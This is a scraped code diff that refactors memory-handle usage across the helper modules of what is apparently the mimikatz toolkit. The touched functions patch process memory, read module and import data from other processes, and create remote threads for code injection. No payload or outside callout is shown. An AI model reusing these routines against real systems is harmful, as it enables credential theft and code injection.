BOOL kull_m_memory_open(IN KULL_M_MEMORY_TYPE Type, IN HANDLE hAny, OUT PKULL_M_MEMORY_HANDLE *hMemory)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
@ -86,8 +88,7 @@ BOOL kull_m_memory_copy(OUT PKULL_M_MEMORY_ADDRESS Destination, IN PKULL_M_MEMOR
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
BOOL bufferMeFirst = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
DWORD nbReadWrite;
|
||||
|
||||
switch(Destination->hMemory->type)
|
||||
@ -169,8 +170,7 @@ BOOL kull_m_memory_copy(OUT PKULL_M_MEMORY_ADDRESS Destination, IN PKULL_M_MEMOR
|
||||
BOOL kull_m_memory_search(IN PKULL_M_MEMORY_ADDRESS Pattern, IN SIZE_T Length, IN PKULL_M_MEMORY_SEARCH Search, IN BOOL bufferMeFirst)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_SEARCH sBuffer = {{{NULL, &hBuffer}, Search->kull_m_memoryRange.size}, NULL};
|
||||
KULL_M_MEMORY_SEARCH sBuffer = {{{NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, Search->kull_m_memoryRange.size}, NULL};
|
||||
PBYTE CurrentPtr;
|
||||
PBYTE limite = (PBYTE) Search->kull_m_memoryRange.kull_m_memoryAdress.address + Search->kull_m_memoryRange.size;
|
||||
|
||||
@ -323,8 +323,7 @@ BOOL kull_m_memory_protect(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T dwSize,
|
||||
BOOL kull_m_memory_equal(IN PKULL_M_MEMORY_ADDRESS Address1, IN PKULL_M_MEMORY_ADDRESS Address2, IN SIZE_T Lenght)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
switch(Address1->hMemory->type)
|
||||
{
|
||||
case KULL_M_MEMORY_TYPE_OWN:
|
||||
|
||||
@ -48,6 +48,7 @@ typedef struct _KULL_M_MEMORY_HANDLE {
|
||||
PKULL_M_MEMORY_HANDLE_KERNEL pHandleDriver;
|
||||
};
|
||||
} KULL_M_MEMORY_HANDLE, *PKULL_M_MEMORY_HANDLE;
|
||||
KULL_M_MEMORY_HANDLE KULL_M_MEMORY_GLOBAL_OWN_HANDLE;
|
||||
|
||||
typedef struct _KULL_M_MEMORY_ADDRESS {
|
||||
LPVOID address;
|
||||
|
||||
@ -8,9 +8,8 @@
|
||||
BOOL kull_m_patch(PKULL_M_MEMORY_SEARCH sMemory, PKULL_M_MEMORY_ADDRESS pPattern, SIZE_T szPattern, PKULL_M_MEMORY_ADDRESS pPatch, SIZE_T szPatch, LONG offsetOfPatch, PKULL_M_PATCH_CALLBACK pCallBackBeforeRestore, int argc, wchar_t * args[], NTSTATUS * pRetCallBack)
|
||||
{
|
||||
BOOL result = FALSE, resultBackup = !pCallBackBeforeRestore, resultProtect = TRUE;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS destination = {NULL, sMemory->kull_m_memoryRange.kull_m_memoryAdress.hMemory};
|
||||
KULL_M_MEMORY_ADDRESS backup = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS backup = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
MEMORY_BASIC_INFORMATION readInfos;
|
||||
NTSTATUS status;
|
||||
DWORD flags, oldProtect = 0, tempProtect = 0;
|
||||
@ -78,12 +77,11 @@ BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generic
|
||||
BOOL result = FALSE;
|
||||
SERVICE_STATUS_PROCESS ServiceStatusProcess;
|
||||
PKULL_M_MEMORY_HANDLE hMemory;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModule;
|
||||
HANDLE hProcess;
|
||||
KULL_M_MEMORY_ADDRESS
|
||||
aPatternMemory = {NULL, &hLocalMemory},
|
||||
aPatchMemory = {NULL, &hLocalMemory};
|
||||
aPatternMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE},
|
||||
aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
|
||||
PKULL_M_PATCH_GENERIC currenReferences;
|
||||
|
||||
@ -70,8 +70,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
||||
PEB_F32 Peb32; PEB_LDR_DATA_F32 LdrData32; LDR_DATA_TABLE_ENTRY_F32 LdrEntry32;
|
||||
#endif
|
||||
ULONG i;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS aProcess= {NULL, memory};
|
||||
PBYTE aLire, fin;
|
||||
PWCHAR moduleNameW;
|
||||
@ -346,8 +345,7 @@ BOOL kull_m_process_peb(PKULL_M_MEMORY_HANDLE memory, PPEB pPeb, BOOL isWOW)
|
||||
BOOL status = FALSE;
|
||||
PROCESS_BASIC_INFORMATION processInformations;
|
||||
HANDLE hProcess = (memory->type == KULL_M_MEMORY_TYPE_PROCESS) ? memory->pHandleProcess->hProcess : GetCurrentProcess();
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {pPeb, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {pPeb, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS aProcess= {NULL, memory};
|
||||
PROCESSINFOCLASS info;
|
||||
ULONG szPeb, szBuffer, szInfos;
|
||||
@ -398,8 +396,7 @@ BOOL kull_m_process_ntheaders(PKULL_M_MEMORY_ADDRESS pBase, PIMAGE_NT_HEADERS *
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
IMAGE_DOS_HEADER headerImageDos;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&headerImageDos, &hBuffer}, aRealNtHeaders = {NULL, &hBuffer}, aProcess= {NULL, pBase->hMemory};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&headerImageDos, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aRealNtHeaders = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess= {NULL, pBase->hMemory};
|
||||
DWORD size;
|
||||
|
||||
if(kull_m_memory_copy(&aBuffer, pBase, sizeof(IMAGE_DOS_HEADER)) && headerImageDos.e_magic == IMAGE_DOS_SIGNATURE)
|
||||
@ -429,8 +426,7 @@ BOOL kull_m_process_ntheaders(PKULL_M_MEMORY_ADDRESS pBase, PIMAGE_NT_HEADERS *
|
||||
BOOL kull_m_process_datadirectory(PKULL_M_MEMORY_ADDRESS pBase, DWORD entry, PDWORD pRva, PDWORD pSize, PWORD pMachine, PVOID *pData)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS aProcess= *pBase;
|
||||
|
||||
DWORD rva, size;
|
||||
@ -566,8 +562,7 @@ PSTR kull_m_process_getImportNameWithoutEnd(PKULL_M_MEMORY_ADDRESS base)
|
||||
{
|
||||
CHAR sEnd = '\0';
|
||||
SIZE_T size;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aStringBuffer = {NULL, &hBuffer}, aNullBuffer = {&sEnd, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aStringBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aNullBuffer = {&sEnd, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{base->address, base->hMemory}, MAX_PATH}, NULL};
|
||||
|
||||
if(kull_m_memory_search(&aNullBuffer, sizeof(sEnd), &sMemory, FALSE))
|
||||
@ -582,12 +577,11 @@ PSTR kull_m_process_getImportNameWithoutEnd(PKULL_M_MEMORY_ADDRESS base)
|
||||
|
||||
NTSTATUS kull_m_process_getImportedEntryInformations(PKULL_M_MEMORY_ADDRESS address, PKULL_M_IMPORTED_ENTRY_ENUM_CALLBACK callBack, PVOID pvArg)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
PVOID pLocalBuffer;
|
||||
PIMAGE_IMPORT_DESCRIPTOR pImportDir;
|
||||
ULONG sizeThunk;
|
||||
ULONGLONG OriginalFirstThunk, FirstThunk, ordinalPattern;
|
||||
KULL_M_MEMORY_ADDRESS aOriginalFirstThunk = {&OriginalFirstThunk, &hBuffer}, aFirstThunk = {&FirstThunk, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aOriginalFirstThunk = {&OriginalFirstThunk, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aFirstThunk = {&FirstThunk, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS aProcOriginalFirstThunk = {NULL, address->hMemory}, aProcName = {NULL, address->hMemory};
|
||||
KULL_M_PROCESS_IMPORTED_ENTRY importedEntry;
|
||||
BOOL continueCallback = TRUE;
|
||||
|
||||
@ -26,8 +26,7 @@ BOOL kull_m_remotelib_create(PKULL_M_MEMORY_ADDRESS aRemoteFunc, PREMOTE_LIB_INP
|
||||
BOOL success = FALSE;
|
||||
NTSTATUS status;
|
||||
HANDLE hThread;
|
||||
KULL_M_MEMORY_HANDLE hLocalBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aRemoteData = {NULL, aRemoteFunc->hMemory}, aSuppData = {NULL, aRemoteFunc->hMemory}, aLocalAddr = {NULL, &hLocalBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aRemoteData = {NULL, aRemoteFunc->hMemory}, aSuppData = {NULL, aRemoteFunc->hMemory}, aLocalAddr = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
PREMOTE_LIB_DATA data;
|
||||
REMOTE_LIB_OUTPUT_DATA oData;
|
||||
MIMIDRV_THREAD_INFO drvInfo = {(PTHREAD_START_ROUTINE) aRemoteFunc->address, NULL};
|
||||
@ -170,8 +169,7 @@ BOOL kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(PKULL_M_MEMORY_HANDLE
|
||||
{
|
||||
BOOL success = FALSE;
|
||||
DWORD i, j;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalAddr = {(LPVOID) Buffer, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalAddr = {(LPVOID) Buffer, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
DestAddress->hMemory = hProcess;
|
||||
DestAddress->address = NULL;
|
||||
|
||||
Loading…
Reference in New Issue
Block a user